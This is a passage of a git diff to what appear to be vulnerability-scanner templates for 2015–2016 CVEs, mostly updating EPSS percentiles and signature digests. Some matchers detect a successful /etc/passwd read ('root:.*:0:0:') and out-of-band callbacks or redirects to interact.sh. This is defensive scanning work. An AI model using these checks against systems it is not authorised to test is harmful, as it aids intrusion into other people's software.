cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202a36311e71e3cdec46b20d9b6049f14b0c0300ff143964557a6348289c1a1062022022b42092c01b37c6b52159bc951c9598fa0de334cec5042683bc91487a8f0706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202a36311e71e3cdec46b20d9b6049f14b0c0300ff143964557a6348289c1a1062022022b42092c01b37c6b52159bc951c9598fa0de334cec5042683bc91487a8f0706:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 4b68fd8985..b35cf30802 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.02372 - epss-percentile: 0.88658 + epss-percentile: 0.88667 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b794b66b8a1b677a5f80808daa31288e68fed148c85baa8526f870fc60dbc3402204121e94d57d57bac36d99c2f14094d462da506cb47933f84a6af918c59a66025:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009b794b66b8a1b677a5f80808daa31288e68fed148c85baa8526f870fc60dbc3402204121e94d57d57bac36d99c2f14094d462da506cb47933f84a6af918c59a66025:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 8079cd4604..f724b854ca 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.70645 + epss-percentile: 0.70663 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022006178711f74486976dec4d0cb2b3a1326cca7c6cf0f58ebccfec1e44566e2da20221008a18227330603f6a408b01c01940f54057f8c01b80410c06834bb0f2e5825e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022006178711f74486976dec4d0cb2b3a1326cca7c6cf0f58ebccfec1e44566e2da20221008a18227330603f6a408b01c01940f54057f8c01b80410c06834bb0f2e5825e32:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 2169350a18..0a18de9598 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88499 + epss-percentile: 0.88509 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022060e6a326c725c6f60d2f3aced8a04e334356aadb8ec890ea11b04318bb83d6c602204ab556432549ce91848522bdf915c9ccb0041f8b7b8c56b19e236743317d2c15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022060e6a326c725c6f60d2f3aced8a04e334356aadb8ec890ea11b04318bb83d6c602204ab556432549ce91848522bdf915c9ccb0041f8b7b8c56b19e236743317d2c15:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index d0d3810772..50e38a71d6 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5354 cwe-id: CWE-601 epss-score: 0.00166 - epss-percentile: 0.53141 + epss-percentile: 0.53151 cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a004730450220111588b78c7cb5bf17acf07467a6846ad72f4c02511f12dbc839c1d1ed5bc4f5022100b48d34fe9b4763c3d3d6b98238390bb5f0cda9660593f8b45219f2c8172da0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220111588b78c7cb5bf17acf07467a6846ad72f4c02511f12dbc839c1d1ed5bc4f5022100b48d34fe9b4763c3d3d6b98238390bb5f0cda9660593f8b45219f2c8172da0bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index c13528cc67..9509114243 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.74959 + epss-percentile: 0.74975 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100c8fcc848d7c767765c054a0a63d8dd36b25df928f090e279c73d92210f3016b9022100a419c1230070bca6b2673e7fe2672c63f99ebcebd9eed530bb7004eb903099fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c8fcc848d7c767765c054a0a63d8dd36b25df928f090e279c73d92210f3016b9022100a419c1230070bca6b2673e7fe2672c63f99ebcebd9eed530bb7004eb903099fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index f8ffcb1060..a7a6d47d1c 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5469 cwe-id: CWE-22 epss-score: 0.02176 - epss-percentile: 0.88158 + epss-percentile: 0.88165 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220288f63e5c2305a7cfcd4b1fc817443df5108376e0813b4fac34286bd2ed8fb0b022100d87ad9e4b6df35a223ad59ccff9c665caefbe3ebc4ef87068de17b7c0f2f2f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220288f63e5c2305a7cfcd4b1fc817443df5108376e0813b4fac34286bd2ed8fb0b022100d87ad9e4b6df35a223ad59ccff9c665caefbe3ebc4ef87068de17b7c0f2f2f6d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 99b53797ab..bd4a7e43c0 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-5471 cwe-id: CWE-22 epss-score: 0.11139 - epss-percentile: 0.94544 + epss-percentile: 0.9455 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204baa872bd202542bbdd5fae020d8fe852090c3299130349a2c89b6e84e79ee39022100d4e6936f064b5cd69df7b458220664739953bc7fa234076a5b351348cc051325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204baa872bd202542bbdd5fae020d8fe852090c3299130349a2c89b6e84e79ee39022100d4e6936f064b5cd69df7b458220664739953bc7fa234076a5b351348cc051325:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 37ab996ef5..65201b72c2 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 - epss-percentile: 0.99724 + epss-percentile: 0.99726 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 @@ -66,4 +66,5 @@ http: - type: status status: - 400 -# digest: 4b0a004830460221009f0a58539cb8d68d3e00f1d142b7f88ac00dfab117e0e6aef7adde5151f68067022100ff0a304ba6e6b437254acad6c3c78f97073b8362a59650abf0fdfa7d59e75469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009f0a58539cb8d68d3e00f1d142b7f88ac00dfab117e0e6aef7adde5151f68067022100ff0a304ba6e6b437254acad6c3c78f97073b8362a59650abf0fdfa7d59e75469:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 3a6b2e05bd..a12094b07c 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.84673 + epss-percentile: 0.84682 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d10c25fbe8f9997a50a37b08f8867f2c64256e111f5a8f342b1c2d371a81f72f0220044bc77c25306fb673529968023356bbe09f151a5004dfb68ac4d776b823026f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d10c25fbe8f9997a50a37b08f8867f2c64256e111f5a8f342b1c2d371a81f72f0220044bc77c25306fb673529968023356bbe09f151a5004dfb68ac4d776b823026f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 171da5a555..d0d27d82dc 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.65862 + epss-percentile: 0.65879 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: part: body words: - "" -# digest: 4a0a00473045022052977067121fabeb3e355636a24726ed71e2eda40d0a64bf022f66ee9801f5a6022100caa7bb2d4f4df06d4ed127e0543565b68a1fd3711bab080afef97b2a24e4cea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022052977067121fabeb3e355636a24726ed71e2eda40d0a64bf022f66ee9801f5a6022100caa7bb2d4f4df06d4ed127e0543565b68a1fd3711bab080afef97b2a24e4cea8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index cb09e759c9..191ccb2a6e 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-6544 cwe-id: CWE-79 epss-score: 0.00284 - epss-percentile: 0.65211 + epss-percentile: 0.65232 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099882d875709ce77372ea63ddb508ba435cacf6e20bfeeec4eb747f63e3a74b20221009e285274fd1f0ce4680a5fd66fee457bf539a3bc6bd30cf7e8f821cb937da4e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210099882d875709ce77372ea63ddb508ba435cacf6e20bfeeec4eb747f63e3a74b20221009e285274fd1f0ce4680a5fd66fee457bf539a3bc6bd30cf7e8f821cb937da4e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 85741c7c9b..7b9672336a 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 - epss-percentile: 0.52552 + epss-percentile: 0.52566 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aced96938d062d0799c32b92ae174932fdc219f388280360cb4a5cb06a5b31e2022053a6ea52e8bc4b5d8ff98d06d5c5f5e75ecf0ad65f49933a0b37d23a6615f713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100aced96938d062d0799c32b92ae174932fdc219f388280360cb4a5cb06a5b31e2022053a6ea52e8bc4b5d8ff98d06d5c5f5e75ecf0ad65f49933a0b37d23a6615f713:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index f7f0e14b52..db6ec4feea 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7245 cwe-id: CWE-22 epss-score: 0.96881 - epss-percentile: 0.99605 + epss-percentile: 0.99606 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100c60897313525a874310900f1eece1d6e28b7ed615b9f73cb64cba8ed497f5c2b0221008ea5c5f6ef608fa09cf3c9af63df22d2f18afd689a277f880ec5266d4346500a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c60897313525a874310900f1eece1d6e28b7ed615b9f73cb64cba8ed497f5c2b0221008ea5c5f6ef608fa09cf3c9af63df22d2f18afd689a277f880ec5266d4346500a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index ccbf6855d6..c30358e810 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00239 - epss-percentile: 0.61785 + epss-percentile: 0.61803 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a57be0109ba0a0672379bd13b16a25b3d69572633453bd8143607ddb741b7c01022100f5d5c00ba8912ae7001b2b3fc060bad8da110738c84df18c54f4e5adacee0efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a57be0109ba0a0672379bd13b16a25b3d69572633453bd8143607ddb741b7c01022100f5d5c00ba8912ae7001b2b3fc060bad8da110738c84df18c54f4e5adacee0efb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 6e7160b530..a6bfee918a 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -66,4 +66,5 @@ http: - type: status status: - 500 -# digest: 490a00463044022023e11869c972c1eb3e7168753defebf4eefa53b12e9927dccf898a864a6cbb30022075b27ec3dd9a1a3d93f3508694b71b9e23bd15310f37ad73828d6ed418199797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022023e11869c972c1eb3e7168753defebf4eefa53b12e9927dccf898a864a6cbb30022075b27ec3dd9a1a3d93f3508694b71b9e23bd15310f37ad73828d6ed418199797:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 4dc8000bc4..571f39d2f7 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-7780 cwe-id: CWE-22 epss-score: 0.00151 - epss-percentile: 0.5119 + epss-percentile: 0.51208 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b125fb77e61aacca279244125cb998beae0256fd56d7e059cafa9e2da942195022100bf9399e83e58677e317efa4b1c0ffae7147fcbb5a67b3e140859918e9e703e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200b125fb77e61aacca279244125cb998beae0256fd56d7e059cafa9e2da942195022100bf9399e83e58677e317efa4b1c0ffae7147fcbb5a67b3e140859918e9e703e01:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index cbbf82dbb7..62f9646e4c 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other epss-score: 0.00233 - epss-percentile: 0.61246 + epss-percentile: 0.61265 cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502204a03aa030b35079de10bd4e988fad3c1c34760ef84c42026098db3b49e1a50de022100ffc83adc21bb8d02a65ce424e0745bb3c21ca44aa4ffd33e49d2167afbd4a08b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204a03aa030b35079de10bd4e988fad3c1c34760ef84c42026098db3b49e1a50de022100ffc83adc21bb8d02a65ce424e0745bb3c21ca44aa4ffd33e49d2167afbd4a08b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 9104b2b2b2..87107985ce 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.0013 - epss-percentile: 0.4762 + epss-percentile: 0.47645 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205c29c4d3ec8dfd843e48e78a9d122dc3969c316f634871ce0dcf6770c2d3d5da022100e2ac6afbc4c8312a802621b6aa4288a98c3cedf9b368b36eb9fcfa52b2cb82b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205c29c4d3ec8dfd843e48e78a9d122dc3969c316f634871ce0dcf6770c2d3d5da022100e2ac6afbc4c8312a802621b6aa4288a98c3cedf9b368b36eb9fcfa52b2cb82b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 86a629413d..85bd72ede5 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-8399 cwe-id: CWE-200 epss-score: 0.9647 - epss-percentile: 0.99437 + epss-percentile: 0.99439 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index dfb803a475..6b5e4aca13 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.74003 + epss-percentile: 0.74018 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402203788000c470eaab531dfcbd09628e96a09c4a9370e79ed92cb6240272bd1938c0220111d9d54c36e8b5cbf43d2e2fc69cc8cc3a268ff0dd191637fbc3c9374d4c25f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203788000c470eaab531dfcbd09628e96a09c4a9370e79ed92cb6240272bd1938c0220111d9d54c36e8b5cbf43d2e2fc69cc8cc3a268ff0dd191637fbc3c9374d4c25f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 79ed923287..0d00241425 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.3699 + epss-percentile: 0.37015 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - 'contains(body_2, "([A-Za-z0-9]+)<\/span>' internal: true part: body -# digest: 4b0a0048304602210080bd22de58c874352b78ef78e9714dc623c3ce4caaea496fd9ed1409f274d3fb0221008d3a38dc657c31850ed4d7efc83ce046eb42b460938733ba7ef4d843d70dc86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210080bd22de58c874352b78ef78e9714dc623c3ce4caaea496fd9ed1409f274d3fb0221008d3a38dc657c31850ed4d7efc83ce046eb42b460938733ba7ef4d843d70dc86c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 603f2a2d67..c969209836 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10108 cwe-id: CWE-77 epss-score: 0.84853 - epss-percentile: 0.9815 + epss-percentile: 0.98152 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 4a0a004730450221009a12b40c819d35318d262c6db3990a6ad34a9c7ec283a59b47b62c0d883d188e022012a20a546109705cd04eca137ec645ade8f6eb1574857f8e2bff4aca640d7e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009a12b40c819d35318d262c6db3990a6ad34a9c7ec283a59b47b62c0d883d188e022012a20a546109705cd04eca137ec645ade8f6eb1574857f8e2bff4aca640d7e43:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index f2ad434164..e2000b0aad 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10134 cwe-id: CWE-89 epss-score: 0.46819 - epss-percentile: 0.97061 + epss-percentile: 0.97063 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b6e196b2e9c3d990bae609c91b3a9357ac6346db2d1dc64aac6fe947cbf341840220629b81064100eb66094e5baff1c8df2154289e34a5edb183a660853b116a11c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b6e196b2e9c3d990bae609c91b3a9357ac6346db2d1dc64aac6fe947cbf341840220629b81064100eb66094e5baff1c8df2154289e34a5edb183a660853b116a11c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index ca3bab297b..dc159fd811 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10367 cwe-id: CWE-22 epss-score: 0.01346 - epss-percentile: 0.84669 + epss-percentile: 0.84678 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: verified: true @@ -41,4 +41,5 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100e9539f1e5fcbd965c989f24cc3c00c7670114e6733c8992335136249d05319cf02206be55e59631875ee8969ac16f8c08995ab83c976dabab4e19e0833f03d8084c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e9539f1e5fcbd965c989f24cc3c00c7670114e6733c8992335136249d05319cf02206be55e59631875ee8969ac16f8c08995ab83c976dabab4e19e0833f03d8084c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 14b0c0ab29..073eb49588 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10368 cwe-id: CWE-601 epss-score: 0.00179 - epss-percentile: 0.54961 + epss-percentile: 0.54979 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100c57dd277258008be308fbd88faea3a7f6cbaac9fd6a54215ccc5a3cad396961602204420410f12d24a00eff47d40ebc0d3e8bd10cae1f0b3c94badc92cf13cc30b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c57dd277258008be308fbd88faea3a7f6cbaac9fd6a54215ccc5a3cad396961602204420410f12d24a00eff47d40ebc0d3e8bd10cae1f0b3c94badc92cf13cc30b29:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index c92be305e1..208e4d3989 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10924 cwe-id: CWE-22 epss-score: 0.01079 - epss-percentile: 0.82693 + epss-percentile: 0.82711 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022031b534cd1736e1afe417fe966f5e54bba813e8b30771896db06bda88ca9995d7022049e8edcbb2b131fac234a320fcf47ca9478e2afe8ffcb6943432f550f36e1660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022031b534cd1736e1afe417fe966f5e54bba813e8b30771896db06bda88ca9995d7022049e8edcbb2b131fac234a320fcf47ca9478e2afe8ffcb6943432f550f36e1660:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 443abecba8..c210650a2c 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10940 cwe-id: CWE-89 epss-score: 0.00696 - epss-percentile: 0.78045 + epss-percentile: 0.78057 cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 @@ -55,4 +55,5 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and -# digest: 4a0a00473045022044d6b5b5a29a301a15487ce0912b497d9c0ee822ba73ecde3bbe4e2cfb4e9c78022100e4cf4d42079d373261d37f5e4df5429c38dc88685120e993af8f85c7276cc388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022044d6b5b5a29a301a15487ce0912b497d9c0ee822ba73ecde3bbe4e2cfb4e9c78022100e4cf4d42079d373261d37f5e4df5429c38dc88685120e993af8f85c7276cc388:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 8c30ea4fd0..37dcf446d9 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -18,7 +18,7 @@ info: cve-id: 